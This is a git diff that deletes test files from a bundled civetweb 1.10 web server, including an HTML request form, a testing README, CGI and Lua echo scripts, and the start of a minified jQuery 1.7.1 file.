-<h3>Body data</h3>

-<input id="body_none" type="radio" name="body" value="*" /> No body data <br />

-<input id="body_10" type="radio" name="body" value="1234567890" /> 10 Bytes ("1234567890") <br />

-<input id="body_rnd" type="radio" name="body" value="**" /> <input id="body_bytes" type="number" name="body_bytes" value="100" min="0" step="0" max="999999999" oninput="document.getElementById('body_rnd').checked = true" /> Bytes random data <br />

-

-<h3>Submit</h3>

-<input id="send" type="button" onclick="sendreq()" value="Send request" />

-

-</form>

-

-</body></html>

diff --git a/thirdparty/civetweb-1.10/test/README.md b/thirdparty/civetweb-1.10/test/README.md
deleted file mode 100644
index 49f2245..0000000
--- a/thirdparty/civetweb-1.10/test/README.md
+++ /dev/null
@@ -1,25 +0,0 @@
-Testing
-=======
-
-C API
------
-
-The unit tests leverage the CTest and Check frameworks to provide a easy
-environment to build up unit tests. They are split into Public and Private
-test suites reflecting the public and internal API functions of civetweb.
-
-When adding new functionality to civetweb tests should be written so that the
-new functionality will be tested across the continuous build servers. There
-are various levels of the unit tests:
-
-  * Tests are included in
-  * Test Cases which are there are multiple in
-  * Test Suites which are ran by the check framework by
-  * `civetweb-unit-tests` which is driven using the `--suite` and
-    `--test-case` arguments by
-  * CTest via `add_test` in `CMakeLists.txt`
-
-Each test suite and test case is ran individually by CTest so that it provides
-good feedback to the continuous integration servers and also CMake. Adding a
-new test case or suite will require the corresponding `add_test` driver to be
-added to `CMakeLists.txt`
diff --git a/thirdparty/civetweb-1.10/test/ajax/echo.cgi b/thirdparty/civetweb-1.10/test/ajax/echo.cgi
deleted file mode 100644
index 577c4bd..0000000
--- a/thirdparty/civetweb-1.10/test/ajax/echo.cgi
+++ /dev/null
@@ -1,8 +0,0 @@
-#!/bin/sh
-
-echo "Content-Type: text/plain; charset=utf-8"
-echo "Connection: close"
-echo "Cache-Control: no-cache"
-echo ""
-
-echo "{}"
diff --git a/thirdparty/civetweb-1.10/test/ajax/echo.cgi.old b/thirdparty/civetweb-1.10/test/ajax/echo.cgi.old
deleted file mode 100644
index 3f4eeeb..0000000
--- a/thirdparty/civetweb-1.10/test/ajax/echo.cgi.old
+++ /dev/null
@@ -1,73 +0,0 @@
-#!/usr/bin/lua5.1

-

--- Every CGI script that returns any valid JSON object will work in the test.

--- In case you do not have not yet used CGI, you may want to use this script which is written in Lua.

--- You may download an interpreter from http://luabinaries.sourceforge.net/download.html, extract it

--- to some folder in your search path (the path of the webserver or /usr/bin on Linux), and add the

--- following lines to your .conf file.

--- cgi_interpreter c:\somewhere\lua5.1.exe

--- enable_keep_alive yes

-

-resp = "{";

-

-method = os.getenv("REQUEST_METHOD")

-uri = os.getenv("REQUEST_URI");

-query = os.getenv("QUERY_STRING");

-datalen = os.getenv("CONTENT_LENGTH");

-

-if method then

-  resp = resp .. '"method" : "' .. method .. '", ';

-end

-if uri then

-  resp = resp .. '"uri" : "' .. uri .. '", ';

-end

-if query then

-  resp = resp .. '"query" : "' .. query .. '", ';

-end

-if datalen then

-  resp = resp .. '"datalen" : "' .. datalen .. '", ';

-end

-

-resp = resp .. '"time" : "' .. os.date() .. '" ';

-

-resp = resp .. "}";

-

-

-

-

-print "Status: 200 OK"

-print "Connection: close"

---print "Connection: keep-alive"

-print "Content-Type: text/html; charset=utf-8"

-print "Cache-Control: no-cache"

---print ("Content-Length: " .. resp:len())

-print ""

-

-print (resp)

-

-

-doLogging = false

-

-if (doLogging) then

-  -- Store the POST data to a file

-  if (method == "POST") then

-    myFile = io.open("data" .. query:sub(4) .. ".txt", "wb");

-    myFile:write(resp)

-    myFile:write("\r\n\r\n")  

-    if datalen then

-      datalen = tonumber(datalen)

-      myFile:write("<<< " .. datalen .. " bytes of data >>>\r\n")

-      

-      data = io.stdin:read(datalen)

-      myFile:write(data)

-      

-      myFile:write("\r\n<<< end >>>\r\n")

-    else

-      myFile:write("<<< no data >>>\r\n")

-    end  

-    myFile:close()

-  end

-end

-

-

-

diff --git a/thirdparty/civetweb-1.10/test/ajax/echo.lp b/thirdparty/civetweb-1.10/test/ajax/echo.lp
deleted file mode 100644
index 7276f81..0000000
--- a/thirdparty/civetweb-1.10/test/ajax/echo.lp
+++ /dev/null
@@ -1,9 +0,0 @@
-<?

--- This *.lp file simply runs the *.lua file in the same directory.

-n = string.match(mg.request_info.uri, "^(.*)%.lp$")

-if mg.system:find("Windows") then

-    n = string.gsub(n, [[/]], [[\]])

-end

-n = mg.document_root .. n .. ".lua"

-dofile(n)

-?>
\ No newline at end of file
diff --git a/thirdparty/civetweb-1.10/test/ajax/echo.lua b/thirdparty/civetweb-1.10/test/ajax/echo.lua
deleted file mode 100644
index 1317516..0000000
--- a/thirdparty/civetweb-1.10/test/ajax/echo.lua
+++ /dev/null
@@ -1,35 +0,0 @@
-resp = "{";

-

-method = mg.request_info.request_method

-uri = mg.request_info.uri

-query = mg.request_info.query_string

-datalen = nil -- TODO: "CONTENT_LENGTH" !

-

-if method then

-  resp = resp .. '"method" : "' .. method .. '", ';

-end

-if uri then

-  resp = resp .. '"uri" : "' .. uri .. '", ';

-end

-if query then

-  resp = resp .. '"query" : "' .. query .. '", ';

-end

-if datalen then

-  resp = resp .. '"datalen" : "' .. datalen .. '", ';

-end

-

-resp = resp .. '"time" : "' .. os.date() .. '" ';

-

-resp = resp .. "}";

-

-

-

-mg.write("HTTP/1.1 200 OK\r\n")

-mg.write("Connection: close\r\n")

-mg.write("Content-Type: text/html\r\n")

-mg.write("Cache-Control: no-cache\r\n")

---mg.write("Content-Length: " .. resp:len() .. "\n")

-mg.write("\r\n")

-

-mg.write(resp)

-

diff --git a/thirdparty/civetweb-1.10/test/ajax/jquery.js b/thirdparty/civetweb-1.10/test/ajax/jquery.js
deleted file mode 100644
index 198b3ff..0000000
--- a/thirdparty/civetweb-1.10/test/ajax/jquery.js
+++ /dev/null
@@ -1,4 +0,0 @@
-/*! jQuery v1.7.1 jquery.com | jquery.org/license */
-(function(a,b){function cy(a){return f.isWindow(a)?a:a.nodeType===9?a.defaultView||a.parentWindow:!1}function cv(a){if(!ck[a]){var b=c.body,d=f("<"+a+">").appendTo(b),e=d.css("display");d.remove();if(e==="none"||e===""){cl||(cl=c.createElement("iframe"),cl.frameBorder=cl.width=cl.height=0),b.appendChild(cl);if(!cm||!cl.createElement)cm=(cl.contentWindow||cl.contentDocument).document,cm.write((c.compatMode==="CSS1Compat"?"<!doctype html>":"")+"<html><body>"),cm.close();d=cm.createElement(a),cm.body.appendChild(d),e=f.css(d,"display"),b.removeChild(cl)}ck[a]=e}return ck[a]}function cu(a,b){var c={};f.each(cq.concat.apply([],cq.slice(0,b)),function(){c[this]=a});return c}function ct(){cr=b}function cs(){setTimeout(ct,0);return cr=f.now()}function cj(){try{return new a.ActiveXObject("Microsoft.XMLHTTP")}catch(b){}}function ci(){try{return new a.XMLHttpRequest}catch(b){}}function cc(a,c){a.dataFilter&&(c=a.dataFilter(c,a.dataType));var d=a.dataTypes,e={},g,h,i=d.length,j,k=d[0],l,m,n,o,p;for(g=1;g<i;g++){if(g===1)for(h in a.converters)typeof h=="string"&&(e[h.toLowerCase()]=a.converters[h]);l=k,k=d[g];if(k==="*")k=l;else if(l!=="*"&&l!==k){m=l+" "+k,n=e[m]||e["* "+k];if(!n){p=b;for(o in e){j=o.split(" ");if(j[0]===l||j[0]==="*"){p=e[j[1]+" "+k];if(p){o=e[o],o===!0?n=p:p===!0&&(n=o);break}}}}!n&&!p&&f.error("No conversion from "+m.replace(" "," to ")),n!==!0&&(c=n?n(c):p(o(c)))}}return c}function cb(a,c,d){var e=a.contents,f=a.dataTypes,g=a.responseFields,h,i,j,k;for(i in g)i in d&&(c[g[i]]=d[i]);while(f[0]==="*")f.shift(),h===b&&(h=a.mimeType||c.getResponseHeader("content-type"));if(h)for(i in e)if(e[i]&&e[i].test(h)){f.unshift(i);break}if(f[0]in d)j=f[0];else{for(i in d){if(!f[0]||a.converters[i+" "+f[0]]){j=i;break}k||(k=i)}j=j||k}if(j){j!==f[0]&&f.unshift(j);return d[j]}}function ca(a,b,c,d){if(f.isArray(b))f.each(b,function(b,e){c||bE.test(a)?d(a,e):ca(a+"["+(typeof e=="object"||f.isArray(e)?b:"")+"]",e,c,d)});else if(!c&&b!=null&&typeof b=="object")for(var e in b)ca(a+"["+e+"]",b[e],c,d);else d(a,b)}function b_(a,c){var d,e,g=f.ajaxSettings.flatOptions||{};for(d in c)c[d]!==b&&((g[d]?a:e||(e={}))[d]=c[d]);e&&f.extend(!0,a,e)}function b$(a,c,d,e,f,g){f=f||c.dataTypes[0],g=g||{},g[f]=!0;var h=a[f],i=0,j=h?h.length:0,k=a===bT,l;for(;i<j&&(k||!l);i++)l=h[i](c,d,e),typeof l=="string"&&(!k||g[l]?l=b:(c.dataTypes.unshift(l),l=b$(a,c,d,e,l,g)));(k||!l)&&!g["*"]&&(l=b$(a,c,d,e,"*",g));return l}function bZ(a){return function(b,c){typeof b!="string"&&(c=b,b="*");if(f.isFunction(c)){var d=b.toLowerCase().split(bP),e=0,g=d.length,h,i,j;for(;e<g;e++)h=d[e],j=/^\+/.test(h),j&&(h=h.substr(1)||"*"),i=a[h]=a[h]||[],i[j?"unshift":"push"](c)}}}function bC(a,b,c){var d=b==="width"?a.offsetWidth:a.offsetHeight,e=b==="width"?bx:by,g=0,h=e.length;if(d>0){if(c!=="border")for(;g<h;g++)c||(d-=parseFloat(f.css(a,"padding"+e[g]))||0),c==="margin"?d+=parseFloat(f.css(a,c+e[g]))||0:d-=parseFloat(f.css(a,"border"+e[g]+"Width"))||0;return d+"px"}d=bz(a,b,b);if(d<0||d==null)d=a.style[b]||0;d=parseFloat(d)||0;if(c)for(;g<h;g++)d+=parseFloat(f.css(a,"padding"+e[g]))||0,c!=="padding"&&(d+=parseFloat(f.css(a,"border"+e[g]+"Width"))||0),c==="margin"&&(d+=parseFloat(f.css(a,c+e[g]))||0);return d+"px"}function bp(a,b){b.src?f.ajax({url:b.src,async:!1,dataType:"script"}):f.globalEval((b.text||b.textContent||b.innerHTML||"").replace(bf,"/*$0*/")),b.parentNode&&b.parentNode.removeChild(b)}function bo(a){var b=c.createElement("div");bh.appendChild(b),b.innerHTML=a.outerHTML;return b.firstChild}function bn(a){var b=(a.nodeName||"").toLowerCase();b==="input"?bm(a):b!=="script"&&typeof a.getElementsByTagName!="undefined"&&f.grep(a.getElementsByTagName("input"),bm)}function bm(a){if(a.type==="checkbox"||a.type==="radio")a.defaultChecked=a.checked}function bl(a){return typeof a.getElementsByTagName!="undefined"?a.getElementsByTagName("*"):typeof a.querySelectorAll!="undefined"?a.querySelectorAll("*"):[]}function bk(a,b){var c;if(b.nodeType===1){b.clearAttributes&&b.clearAttributes(),b.mergeAttributes&&b.mergeAttributes(a),c=b.nodeName.toLowerCase();if(c==="object")b.outerHTML=a.outerHTML;else if(c!=="input"||a.type!=="checkbox"&&a.type!=="radio"){if(c==="option")b.selected=a.defaultSelected;else if(c==="input"||c==="textarea")b.defaultValue=a.defaultValue}else a.checked&&(b.defaultChecked=b.checked=a.checked),b.value!==a.value&&(b.value=a.value);b.removeAttribute(f.expando)}}function bj(a,b){if(b.nodeType===1&&!!f.hasData(a)){var c,d,e,g=f._data(a),h=f._data(b,g),i=g.events;if(i){delete h.handle,h.events={};for(c in i)for(d=0,e=i[c].length;d<e;d++)f.event.add(b,c+(i[c][d].namespace?".":"")+i[c][d].namespace,i[c][d],i[c][d].data)}h.data&&(h.data=f.extend({},h.data))}}function bi(a,b){return f.nodeName(a,"table")?a.getElementsByTagName("tbody")[0]||a.appendChild(a.ownerDocument.createElement("tbody")):a}function U(a){var b=V.split("|"),c=a.createDocumentFragment();if(c.createElement)while(b.length)c.createElement(b.pop());return c}function T(a,b,c){b=b||0;if(f.isFunction(b))return f.grep(a,function(a,d){var e=!!b.call(a,d,a);return e===c});if(b.nodeType)return f.grep(a,function(a,d){return a===b===c});if(typeof b=="string"){var d=f.grep(a,function(a){return a.nodeType===1});if(O.test(b))return f.filter(b,d,!c);b=f.filter(b,d)}return f.grep(a,function(a,d){return f.inArray(a,b)>=0===c})}function S(a){return!a||!a.parentNode||a.parentNode.nodeType===11}function K(){return!0}function J(){return!1}function n(a,b,c){var d=b+"defer",e=b+"queue",g=b+"mark",h=f._data(a,d);h&&(c==="queue"||!f._data(a,e))&&(c==="mark"||!f._data(a,g))&&setTimeout(function(){!f._data(a,e)&&!f._data(a,g)&&(f.removeData(a,d,!0),h.fire())},0)}function m(a){for(var b in a){if(b==="data"&&f.isEmptyObject(a[b]))continue;if(b!=="toJSON")return!1}return!0}function l(a,c,d){if(d===b&&a.nodeType===1){var e="data-"+c.replace(k,"-$1").toLowerCase();d=a.getAttribute(e);if(typeof d=="string"){try{d=d==="true"?!0:d==="false"?!1:d==="null"?null:f.isNumeric(d)?parseFloat(d):j.test(d)?f.parseJSON(d):d}catch(g){}f.data(a,c,d)}else d=b}return d}function h(a){var b=g[a]={},c,d;a=a.split(/\s+/);for(c=0,d=a.length;c<d;c++)b[a[c]]=!0;return b}var c=a.document,d=a.navigator,e=a.location,f=function(){function J(){if(!e.isReady){try{c.documentElement.doScroll("left")}catch(a){setTimeout(J,1);return}e.ready()}}var e=function(a,b){return new e.fn.init(a,b,h)},f=a.jQuery,g=a.$,h,i=/^(?:[^#<]*(<[\w\W]+>)[^>]*$|#([\w\-]*)$)/,j=/\S/,k=/^\s+/,l=/\s+$/,m=/^<(\w+)\s*\/?>(?:<\/\1>)?$/,n=/^[\],:{}\s]*$/,o=/\\(?:["\\\/bfnrt]|u[0-9a-fA-F]{4})/g,p=/"[^"\\\n\r]*"|true|false|null|-?\d+(?:\.\d*)?(?:[eE][+\-]?\d+)?/g,q=/(?:^|:|,)(?:\s*\[)+/g,r=/(webkit)[ \/]([\w.]+)/,s=/(opera)(?:.*version)?[ \/]([\w.]+)/,t=/(msie) ([\w.]+)/,u=/(mozilla)(?:.*? rv:([\w.]+))?/,v=/-([a-z]|[0-9])/ig,w=/^-ms-/,x=function(a,b){return(b+"").toUpperCase()},y=d.userAgent,z,A,B,C=Object.prototype.toString,D=Object.prototype.hasOwnProperty,E=Array.prototype.push,F=Array.prototype.slice,G=String.prototype.trim,H=Array.prototype.indexOf,I={};e.fn=e.prototype={constructor:e,init:function(a,d,f){var g,h,j,k;if(!a)return this;if(a.nodeType){this.context=this[0]=a,this.length=1;return this}if(a==="body"&&!d&&c.body){this.context=c,this[0]=c.body,this.selector=a,this.length=1;return this}if(typeof a=="string"){a.charAt(0)!=="<"||a.charAt(a.length-1)!==">"||a.length<3?g=i.exec(a):g=[null,a,null];if(g&&(g[1]||!d)){if(g[1]){d=d instanceof e?d[0]:d,k=d?d.ownerDocument||d:c,j=m.exec(a),j?e.isPlainObject(d)?(a=[c.createElement(j[1])],e.fn.attr.call(a,d,!0)):a=[k.createElement(j[1])]:(j=e.buildFragment([g[1]],[k]),a=(j.cacheable?e.clone(j.fragment):j.fragment).childNodes);return e.merge(this,a)}h=c.getElementById(g[2]);if(h&&h.parentNode){if(h.id!==g[2])return f.find(a);this.length=1,this[0]=h}this.context=c,this.selector=a;return this}return!d||d.jquery?(d||f).find(a):this.constructor(d).find(a)}if(e.isFunction(a))return f.ready(a);a.selector!==b&&(this.selector=a.selector,this.context=a.context);return e.makeArray(a,this)},selector:"",jquery:"1.7.1",length:0,size:function(){return this.length},toArray:function(){return F.call(this,0)},get:function(a){return a==null?this.toArray():a<0?this[this.length+a]:this[a]},pushStack:function(a,b,c){var d=this.constructor();e.isArray(a)?E.apply(d,a):e.merge(d,a),d.prevObject=this,d.context=this.context,b==="find"?d.selector=this.selector+(this.selector?" ":"")+c:b&&(d.selector=this.selector+"."+b+"("+c+")");return d},each:function(a,b){return e.each(this,a,b)},ready:function(a){e.bindReady(),A.add(a);return this},eq:function(a){a=+a;return a===-1?this.slice(a):this.slice(a,a+1)},first:function(){return this.eq(0)},last:function(){return this.eq(-1)},slice:function(){return this.pushStack(F.apply(this,arguments),"slice",F.call(arguments).join(","))},map:function(a){return this.pushStack(e.map(this,function(b,c){return a.call(b,c,b)}))},end:function(){return this.prevObject||this.constructor(null)},push:E,sort:[].sort,splice:[].splice},e.fn.init.prototype=e.fn,e.extend=e.fn.extend=function(){var a,c,d,f,g,h,i=arguments[0]||{},j=1,k=arguments.length,l=!1;typeof i=="boolean"&&(l=i,i=arguments[1]||{},j=2),typeof i!="object"&&!e.isFunction(i)&&(i={}),k===j&&(i=this,--j);for(;j<k;j++)if((a=arguments[j])!=null)for(c in a){d=i[c],f=a[c];if(i===f)continue;l&&f&&(e.isPlainObject(f)||(g=e.isArray(f)))?(g?(g=!1,h=d&&e.isArray(d)?d:[]):h=d&&e.isPlainObject(d)?d:{},i[c]=e.extend(l,h,f)):f!==b&&(i[c]=f)}return i},e.extend({noConflict:function(b){a.$===e&&(a.$=g),b&&a.jQuery===e&&(a.jQuery=f);return e},isReady:!1,readyWait:1,holdReady:function(a){a?e.readyWait++:e.ready(!0)},ready:function(a){if(a===!0&&!--e.readyWait||a!==!0&&!e.isReady){if(!c.body)return setTimeout(e.ready,1);e.isReady=!0;if(a!==!0&&--e.readyWait>0)return;A.fireWith(c,[e]),e.fn.trigger&&e(c).trigger("ready").off("ready")}},bindReady:function(){if(!A){A=e.Callbacks("once memory");if(c.readyState==="complete")return setTimeout(e.ready,1);if(c.addEventListener)c.addEventListener("DOMContentLoaded",B,!1),a.addEventListener("load",e.ready,!1);else if(c.attachEvent){c.attachEvent("onreadystatechange",B),a.attachEvent("onload",e.ready);var b=!1;try{b=a.frameElement==null}catch(d){}c.documentElement.doScroll&&b&&J()}}},isFunction:function(a){return e.type(a)==="function"},isArray:Array.isArray||function(a){return e.type(a)==="array"},isWindow:function(a){return a&&typeof a=="object"&&"setInterval"in a},isNumeric:function(a){return!isNaN(parseFloat(a))&&isFinite(a)},type:function(a){return a==null?String(a):I[C.call(a)]||"object"},isPlainObject:function(a){if(!a||e.type(a)!=="object"||a.nodeType||e.isWindow(a))return!1;try{if(a.constructor&&!D.call(a,"constructor")&&!D.call(a.constructor.prototype,"isPrototypeOf"))return!1}catch(c){return!1}var d;for(d in a);return d===b||D.call(a,d)},isEmptyObject:function(a){for(var b in a)return!1;return!0},error:function(a){throw new Error(a)},parseJSON:function(b){if(typeof b!="string"||!b)return null;b=e.trim(b);if(a.JSON&&a.JSON.parse)return a.JSON.parse(b);if(n.test(b.replace(o,"@").replace(p,"]").replace(q,"")))return(new Function("return "+b))();e.error("Invalid JSON: "+b)},parseXML:function(c){var d,f;try{a.DOMParser?(f=new DOMParser,d=f.parseFromString(c,"text/xml")):(d=new ActiveXObject("Microsoft.XMLDOM"),d.async="false",d.loadXML(c))}catch(g){d=b}(!d||!d.documentElement||d.getElementsByTagName("parsererror").length)&&e.error("Invalid XML: "+c);return d},noop:function(){},globalEval:function(b){b&&j.test(b)&&(a.execScript||function(b){a.eval.call(a,b)})(b)},camelCase:function(a){return a.replace(w,"ms-").replace(v,x)},nodeName:function(a,b){return a.nodeName&&a.nodeName.toUpperCase()===b.toUpperCase()},each:function(a,c,d){var f,g=0,h=a.length,i=h===b||e.isFunction(a);if(d){if(i){for(f in a)if(c.apply(a[f],d)===!1)break}else for(;g<h;)if(c.apply(a[g++],d)===!1)break}else if(i){for(f in a)if(c.call(a[f],f,a[f])===!1)break}else for(;g<h;)if(c.call(a[g],g,a[g++])===!1)break;return a},trim:G?function(a){return a==null?"":G.call(a)}:function(a){return a==null?"":(a+"").replace(k,"").replace(l,"")},makeArray:function(a,b){var c=b||[];if(a!=null){var d=e.type(a);a.length==null||d==="string"||d==="function"||d==="regexp"||e.isWindow(a)?E.call(c,a):e.merge(c,a)}return c},inArray:function(a,b,c){var d;if(b){if(H)return H.call(b,a,c);d=b.length,c=c?c<0?Math.max(0,d+c):c:0;for(;c<d;c++)if(c in b&&b[c]===a)return c}return-1},merge:function(a,c){var d=a.length,e=0;if(typeof c.length=="number")for(var f=c.length;e<f;e++)a[d++]=c[e];else while(c[e]!==b)a[d++]=c[e++];a.length=d;return a},grep:function(a,b,c){var d=[],e;c=!!c;for(var f=0,g=a.length;f<g;f++)e=!!b(a[f],f),c!==e&&d.push(a[f]);return d},map:function(a,c,d){var f,g,h=[],i=0,j=a.length,k=a instanceof e||j!==b&&typeof j=="number"&&(j>0&&a[0]&&a[j-1]||j===0||e.isArray(a));if(k)for(;i<j;i++)f=c(a[i],i,d),f!=null&&(h[h.length]=f);else for(g in a)f=c(a[g],g,d),f!=null&&(h[h.length]=f);return h.concat.apply([],h)},guid:1,proxy:function(a,c){if(typeof c=="string"){var d=a[c];c=a,a=d}if(!e.isFunction(a))return b;var f=F.call(arguments,2),g=function(){return a.apply(c,f.concat(F.call(arguments)))};g.guid=a.guid=a.guid||g.guid||e.guid++;return g},access:function(a,c,d,f,g,h){var i=a.length;if(typeof c=="object"){for(var j in c)e.access(a,j,c[j],f,g,d);return a}if(d!==b){f=!h&&f&&e.isFunction(d);for(var k=0;k<i;k++)g(a[k],c,f?d.call(a[k],k,g(a[k],c)):d,h);return a}return i?g(a[0],c):b},now:function(){return(new Date).getTime()},uaMatch:function(a){a=a.toLowerCase();var b=r.exec(a)||s.exec(a)||t.exec(a)||a.indexOf("compatible")<0&&u.exec(a)||[];return{browser:b[1]||"",version:b[2]||"0"}},sub:function(){function a(b,c){return new a.fn.init(b,c)}e.extend(!0,a,this),a.superclass=this,a.fn=a.prototype=this(),a.fn.constructor=a,a.sub=this.sub,a.fn.init=function(d,f){f&&f instanceof e&&!(f instanceof a)&&(f=a(f));return e.fn.init.call(this,d,f,b)},a.fn.init.prototype=a.fn;var b=a(c);return a},browser:{}}),e.each("Boolean Number String Function Array Date RegExp Object".split(" "),function(a,b){I["[object "+b+"]"]=b.toLowerCase()}),z=e.uaMatch(y),z.browser&&(e.browser[z.browser]=!0,e.browser.version=z.version),e.browser.webkit&&(e.browser.safari=!0),j.test(" ")&&(k=/^[\s\xA0]+/,l=/[\s\xA0]+$/),h=e(c),c.addEventListener?B=function(){c.removeEventListener("DOMContentLoaded",B,!1),e.ready()}:c.attachEvent&&(B=function(){c.readyState==="complete"&&(c.detachEvent("onreadystatechange",B),e.ready())});return e}(),g={};f.Callbacks=function(a){a=a?g[a]||h(a):{};var c=[],d=[],e,i,j,k,l,m=function(b){var d,e,g,h,i;for(d=0,e=b.length;d<e;d++)g=b[d],h=f.type(g),h==="array"?m(g):h==="function"&&(!a.unique||!o.has(g))&&c.push(g)},n=function(b,f){f=f||[],e=!a.memory||[b,f],i=!0,l=j||0,j=0,k=c.length;for(;c&&l<k;l++)if(c[l].apply(b,f)===!1&&a.stopOnFalse){e=!0;break}i=!1,c&&(a.once?e===!0?o.disable():c=[]:d&&d.length&&(e=d.shift(),o.fireWith(e[0],e[1])))},o={add:function(){if(c){var a=c.length;m(arguments),i?k=c.length:e&&e!==!0&&(j=a,n(e[0],e[1]))}return this},remove:function(){if(c){var b=arguments,d=0,e=b.length;for(;d<e;d++)for(var f=0;f<c.length;f++)if(b[d]===c[f]){i&&f<=k&&(k--,f<=l&&l--),c.splice(f--,1);if(a.unique)break}}return this},has:function(a){if(c){var b=0,d=c.length;for(;b<d;b++)if(a===c[b])return!0}return!1},empty:function(){c=[];return this},disable:function(){c=d=e=b;return this},disabled:function(){return!c},lock:function(){d=b,(!e||e===!0)&&o.disable();return this},locked:function(){return!d},fireWith:function(b,c){d&&(i?a.once||d.push([b,c]):(!a.once||!e)&&n(b,c));return this},fire:function(){o.fireWith(this,arguments);return this},fired:function(){return!!e}};return o};var i=[].slice;f.extend({Deferred:function(a){var b=f.Callbacks("once memory"),c=f.Callbacks("once memory"),d=f.Callbacks("memory"),e="pending",g={resolve:b,reject:c,notify:d},h={done:b.add,fail:c.add,progress:d.add,state:function(){return e},isResolved:b.fired,isRejected:c.fired,then:function(a,b,c){i.done(a).fail(b).progress(c);return this},always:function(){i.done.apply(i,arguments).fail.apply(i,arguments);return this},pipe:function(a,b,c){return f.Deferred(function(d){f.each({done:[a,"resolve"],fail:[b,"reject"],progress:[c,"notify"]},function(a,b){var c=b[0],e=b[1],g;f.isFunction(c)?i[a](function(){g=c.apply(this,arguments),g&&f.isFunction(g.promise)?g.promise().then(d.resolve,d.reject,d.notify):d[e+"With"](this===i?d:this,[g])}):i[a](d[e])})}).promise()},promise:function(a){if(a==null)a=h;else for(var b in h)a[b]=h[b];return a}},i=h.promise({}),j;for(j in g)i[j]=g[j].fire,i[j+"With"]=g[j].fireWith;i.done(function(){e="resolved"},c.disable,d.lock).fail(function(){e="rejected"},b.disable,d.lock),a&&a.call(i,i);return i},when:function(a){function m(a){return function(b){e[a]=arguments.length>1?i.call(arguments,0):b,j.notifyWith(k,e)}}function l(a){return function(c){b[a]=arguments.length>1?i.call(arguments,0):c,--g||j.resolveWith(j,b)}}var b=i.call(arguments,0),c=0,d=b.length,e=Array(d),g=d,h=d,j=d<=1&&a&&f.isFunction(a.promise)?a:f.Deferred(),k=j.promise();if(d>1){for(;c<d;c++)b[c]&&b[c].promise&&f.isFunction(b[c].promise)?b[c].promise().then(l(c),j.reject,m(c)):--g;g||j.resolveWith(j,b)}else j!==a&&j.resolveWith(j,d?[a]:[]);return k}}),f.support=function(){var b,d,e,g,h,i,j,k,l,m,n,o,p,q=c.createElement("div"),r=c.documentElement;q.setAttribute("className","t"),q.innerHTML="   <link/><table></table><a href='/a' style='top:1px;float:left;opacity:.55;'>a</a><input type='checkbox'/>",d=q.getElementsByTagName("*"),e=q.getElementsByTagName("a")[0];if(!d||!d.length||!e)return{};g=c.createElement("select"),h=g.appendChild(c.createElement("option")),i=q.getElementsByTagName("input")[0],b={leadingWhitespace:q.firstChild.nodeType===3,tbody:!q.getElementsByTagName("tbody").length,htmlSerialize:!!q.getElementsByTagName("link").length,style:/top/.test(e.getAttribute("style")),hrefNormalized:e.getAttribute("href")==="/a",opacity:/^0.55/.test(e.style.opacity),cssFloat:!!e.style.cssFloat,checkOn:i.value==="on",optSelected:h.selected,getSetAttribute:q.className!=="t",enctype:!!c.createElement("form").enctype,html5Clone:c.createElement("nav").cloneNode(!0).outerHTML!=="<:nav></:nav>",submitBubbles:!0,changeBubbles:!0,focusinBubbles:!1,deleteExpando:!0,noCloneEvent:!0,inlineBlockNeedsLayout:!1,shrinkWrapBlocks:!1,reliableMarginRight:!0},i.checked=!0,b.noCloneChecked=i.cloneNode(!0).checked,g.disabled=!0,b.optDisabled=!h.disabled;try{delete q.test}catch(s){b.deleteExpando=!1}!q.addEventListener&&q.attachEvent&&q.fireEvent&&(q.attachEvent("onclick",function(){b.noCloneEvent=!1}),q.cloneNode(!0).fireEvent("onclick")),i=c.createElement("input"),i.value="t",i.setAttribute("type","radio"),b.radioValue=i.value==="t",i.setAttribute("checked","checked"),q.appendChild(i),k=c.createDocumentFragment(),k.appendChild(q.lastChild),b.checkClone=k.cloneNode(!0).cloneNode(!0).lastChild.checked,b.appendChecked=i.checked,k.removeChild(i),k.appendChild(q),q.innerHTML="",a.getComputedStyle&&(j=c.createElement("div"),j.style.width="0",j.style.marginRight="0",q.style.width="2px",q.appendChild(j),b.reliableMarginRight=(parseInt((a.getComputedStyle(j,null)||{marginRight:0}).marginRight,10)||0)===0);if(q.attachEvent)for(o in{submit:1,change:1,focusin:1})n="on"+o,p=n in q,p||(q.setAttribute(n,"return;"),p=typeof q[n]=="function"),b[o+"Bubbles"]=p;k.removeChild(q),k=g=h=j=q=i=null,f(function(){var a,d,e,g,h,i,j,k,m,n,o,r=c.getElementsByTagName("body")[0];!r||(j=1,k="position:absolute;top:0;left:0;width:1px;height:1px;margin:0;",m="visibility:hidden;border:0;",n="style='"+k+"border:5px solid #000;padding:0;'",o="<div "+n+"><div></div></div>"+"<table "+n+" cellpadding='0' cellspacing='0'>"+"<tr><td></td></tr></table>",a=c.createElement("div"),a.style.cssText=m+"width:0;height:0;position:static;top:0;margin-top:"+j+"px",r.insertBefore(a,r.firstChild),q=c.createElement("div"),a.appendChild(q),q.innerHTML="<table><tr><td style='padding:0;border:0;display:none'></td><td>t</td></tr></table>",l=q.getElementsByTagName("td"),p=l[0].offsetHeight===0,l[0].style.display="",l[1].style.display="none",b.reliableHiddenOffsets=p&&l[0].offsetHeight===0,q.innerHTML="",q.style.width=q.style.paddingLeft="1px",f.boxModel=b.boxModel=q.offsetWidth===2,typeof q.style.zoom!="undefined"&&(q.style.display="inline",q.style.zoom=1,b.inlineBlockNeedsLayout=q.offsetWidth===2,q.style.display="",q.innerHTML="<div style='width:4px;'></div>",b.shrinkWrapBlocks=q.offsetWidth!==2),q.style.cssText=k+m,q.innerHTML=o,d=q.firstChild,e=d.firstChild,h=d.nextSibling.firstChild.firstChild,i={doesNotAddBorder:e.offsetTop!==5,doesAddBorderForTableAndCells:h.offsetTop===5},e.style.position="fixed",e.style.top="20px",i.fixedPosition=e.offsetTop===20||e.offsetTop===15,e.style.position=e.style.top="",d.style.overflow="hidden",d.style.position="relative",i.subtractsBorderForOverflowNotVisible=e.offsetTop===-5,i.doesNotIncludeMarginInBodyOffset=r.offsetTop!==j,r.removeChild(a),q=a=null,f.extend(b,i))});return b}();var j=/^(?:\{.*\}|\[.*\])$/,k=/([A-Z])/g;f.extend({cache:{},uuid:0,expando:"jQuery"+(f.fn.jquery+Math.random()).replace(/\D/g,""),noData:{embed:!0,object:"clsid:D27CDB6E-AE6D-11cf-96B8-444553540000",applet:!0},hasData:function(a){a=a.nodeType?f.cache[a[f.expando]]:a[f.expando];return!!a&&!m(a)},data:function(a,c,d,e){if(!!f.acceptData(a)){var g,h,i,j=f.expando,k=typeof 